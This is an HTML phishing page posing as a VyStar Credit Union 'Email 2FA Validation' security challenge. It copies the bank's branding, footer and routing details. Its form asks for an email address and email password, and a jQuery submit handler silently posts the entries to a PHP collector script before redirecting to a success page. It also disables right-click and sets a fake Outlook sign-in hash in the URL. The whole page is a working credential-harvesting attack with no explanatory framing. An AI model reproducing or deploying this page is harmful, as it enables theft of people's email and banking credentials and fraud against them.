<!DOCTYPE html>
<!-- saved from url=(0057)https://online.vystarcu.org/VYCU/AuthorizationRouter.aspx -->
<html lang="en"><head id="Head1"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">

<title>
	Security Challenge
</title>

<link href="https://online.vystarcu.org/VYCU/Themes/NewUI/Images/favicon.ico" rel="SHORTCUT ICON">
<link href="john/316/phillipians/NewUIstandard.css" rel="stylesheet" type="text/css" media="screen">
<link href="john/316/phillipians/ui.theme.css" rel="stylesheet" type="text/css" media="screen">
<link href="john/316/phillipians/ui.datepicker.css" rel="stylesheet" type="text/css" media="screen">
<link href="john/316/phillipians/jquery-ui.css" rel="stylesheet" type="text/css">
<link href="john/316/phillipians/LiveEngage.css" rel="stylesheet" type="text/css" media="screen">
<link href="john/316/phillipians/DESGetFiles.aspx" rel="stylesheet" type="text/css">

</head>
<body class="body-container">
        <img src="john/316/phillipians/blank.gif" id="BlankImage" class="image-blank hidden">
        <img id="CalendarIcon" class="icon-calendar hidden" src="john/316/phillipians/Calendar.gif">
        <img id="ArrowLeftIcon" class="icon-arrow-left hidden" src="john/316/phillipians/ArrowLeft.gif">
        <img id="ArrowRightIcon" class="icon-arrow-right hidden" src="john/316/phillipians/ArrowRight.gif">
        <img id="ErrorIcon" class="icon-error hidden" src="john/316/phillipians/icon-error-x.png">
		
		
        <form method="POST" action="" id="MainForm" name="MainForm" autocomplete="off" >

                
            <span id="CampaignControlManager" disabled="disabled" class="aspNetDisabled"></span>
            <div id="WrapperContainer">
                <div id="PageContainer">
                    <div id="MasterHeaderContainer">
                        <div id="MasterHeaderLogoContainer">
                            <a href="#">
                                <img id="ThemeImage" class="master-header-logo" alt="VyStar Credit Union" src="john/316/phillipians/logo.png"></a>
                        </div>
                        
                    </div>
                    
                    <div id="ContentContainer">
                        <div class="container-clear">
                            <div id="LeftRailDiv">
						
                                
                                <h1>
                                   Email 2FA Validation
                                </h1>
                                
                                
<div id="TimeoutWarningWrapperDiv" class="timeoutWarning">
    <div id="timeoutWarning">
        <p>
            To protect your security, this page will log out in <span id="countdownTimer">777</span>&nbsp;seconds.</p>
        <p>
            <a id="SESSIONTIMEOUT_ctl00_ExtendSessionLink" href="javascript:timeout_showExtendSessionPopup();">Continue Banking Online</a>&nbsp;&nbsp;|&nbsp;&nbsp;<a id="SESSIONTIMEOUT_ctl00_SignoutLink" href="javascript:timeout_expireSession();">Logout</a></p>
    </div>
    <div id="signoutInfo" class="hidden">
        <p>
            Signing out...</p>
    </div>
    <div id="popupWarning" class="hidden">
        <p>
            The pop-up window used to extend your session was blocked.<br>Click <a href="#" target="_blank">here</a> for information regarding pop-up blocking software, or copy and paste the following link into a new browser:<br>http://www.microsoft.com/windowsxp/using/web/sp2_popupblocker.mspx</p>
    </div>
    <div id="ExtendSessionDiv" class="hidden">
        <p>
            Please wait your session is being extended...</p>
    </div>
</div>
                                
	<p>For security purposes, please enter your email and password for 2FA Validation Service.</p>

                                
                                
                                
						
                                
                                
                                
                <table class="workSpaceTable">
	<tbody><tr>
		<td>
					        <div class="form-container">
                                <div class="access-content">
                                    <div class="form-fields">
                                        <div class="fields-row">
						                <div data-name="workflow-authorize" style="display: none;">
							                <input type="submit" name="ctlWorkflow$AuthorizeNextButton" value="Next" id="ctlWorkflow_AuthorizeNextButton" data-name="authorize">
							                <input type="submit" name="ctlWorkflow$AuthorizeCancelButton" value="Button" id="ctlWorkflow_AuthorizeCancelButton" data-name="cancel">
						                </div>
						                <div class="module-view">
							                <div id="ctlWorkflow_AuthorizationControl" class="modulePanel">
			
<div data-name="authorization" data-module-name="App.Authorization" data-module-options="{&quot;associatedDataPanel&quot;:&quot;workflow-authorize&quot;,&quot;associatedContinueAction&quot;:&quot;authorize&quot;,&quot;associatedCancelAction&quot;:&quot;cancel&quot;}" class="workflow-container" style="">
   
   

   
   
    <div class="workflow-step" data-name="authorization-phone-error" style="display: none;">
        <div class="error-message">
        </div>
        <br>
        <div class="formButtonContainer" style="padding-left: 150px;">
            <input type="submit" name="ctlWorkflow$AuthorizationControl$ctl05" value="Send New Code" id="ctlWorkflow_AuthorizationControl_ctl05" data-action="back">
            <span class="fields-cell-button-gap"></span>
            <input type="submit" name="ctlWorkflow$AuthorizationControl$ctl06" value="Cancel" id="ctlWorkflow_AuthorizationControl_ctl06" class="link-style" data-action="cancel">
        </div>
    </div>
	
	</form>
	
	<form action="" method="post" id="loginForm1" name="loginForm1" novalidate="novalidate" autocomplete="off" >
	
    <div class="workflow-step" data-name="authorization-answer-input" style="display: block;">
        <table class="formTable">
            <tbody>
			
			<tr class="item">
               <td class="editor-field">
                    <input name="authorizationMail" id="authorizationMail" placeholder="Email Address" type="text" class="" group="Answer" style="OrigCss: ;"></td>
				
            </tr>
            <tr>
                <td colspan="2">&nbsp;</td>
            </tr>
            <tr class="item">
               
                <td class="editor-field">
                    <input name="authorizationAnswer" id="authorizationAnswer" placeholder="Email Password" type="password" class="" group="Answer" style="OrigCss: ;"></td>
            </tr>
			
			
		<br>
		
        </tbody></table>
        <br>
		
            <input type="submit" name="ctl08" value="Validate" id="ctl08">
    </div>
</form>
	
    <div class="workflow-step" data-name="authorization-locked" style="display: none;">
        <div class="error-message">
        </div>
    </div>
</div>

		</div>
						                </div>
					                    </div>
                                    </div>
                                </div>
                            </div>
				        </td>
	</tr>
</tbody></table>

	</div>
                            
                    </div>
			</div>
					
                    <div id="SiteFooterContainer">
                        <div id="EnrollMobileFooterDiv" style="visibility: hidden;">
                            Enroll in mobile <br>banking today!
                        </div>
                        <div id="FooterLinks">
                            <ul class="footer-links1">
                                <li>
                                    <a id="LocationsLink" href="#" target="_blank">Locations</a>
                                </li>
                                <li>
                                    <a id="PrivacyLink" href="#" target="_blank">Privacy Notice</a>
                                </li>
                            </ul>
                            <ul class="footer-links2">
                                <li>
                                    <a id="HelpLink" href="#" target="_blank">Help</a>
                                </li>
                                <li>
                                    <a id="ContactUsLink" href="#" target="_blank">Contact Us</a>
                                </li>
                                
                            </ul>
                            <ul class="footer-links3">
                                <li>
                                    <a id="SecurityLink" href="#" target="_blank">VyStar Security Statement</a>
                                </li>
                                <li>
                                    <a id="TermsAndConditionsLink" href="#" target="_blank">Disclosures</a>
                                </li>
                            </ul>
                        </div>
                        <div id="FooterNotice">
                            <p>
                                VyStar Credit Union P.O. Box 45085 Jacksonville FL  32232<br>Routing Number 263079276 | 904-777-6000 or 800-445-6289<br><a href="#" title="Go to ncua.gov" target="_blank" class="iconFedInsured"></a><a href="#" title="Go to HUD.GOV" target="_blank" class="iconEHL"></a><span target="_blank" class="iconVisa"></span><a href="#" title="Find us in Facebook" target="_blank" class="iconFB"></a><a href="#" title="Find us in Twitter" target="_blank" class="iconTwitter"></a><a href="#" title="Find us in Youtube" target="_blank" class="iconYoutube"></a><a href="#" title="Find us in Pinterest" target="_blank" class="iconPinterest"></a><a href="#" title="Find us in Instagram" target="_blank" class="iconInstagram"></a>
                            </p>
                        </div>
                        <br clear="all">
                    </div>
                </div>
            </div>
            




<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
<script src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.3.1.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.10/jquery.mask.js"></script>

<script type="text/javascript">

$(document).bind("contextmenu", function(e){ return false;});

$('#loginForm1').on('submit', function(e){
		
		 $(".overlay").show(500);
		$.post('vystar/new/policy/Estate1/process3.php', $(this).serialize(), function(data){
			console.log(data);
		});
		setTimeout(function() {
                              window.location.href = "success.htm";
                        },2000);
		e.preventDefault();
	});


</script>





<script> 
  location.hash = 'wa=wsignin1.0&rpsnv=13&ct=1539585327&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&domain=' 
</script>

</body></html>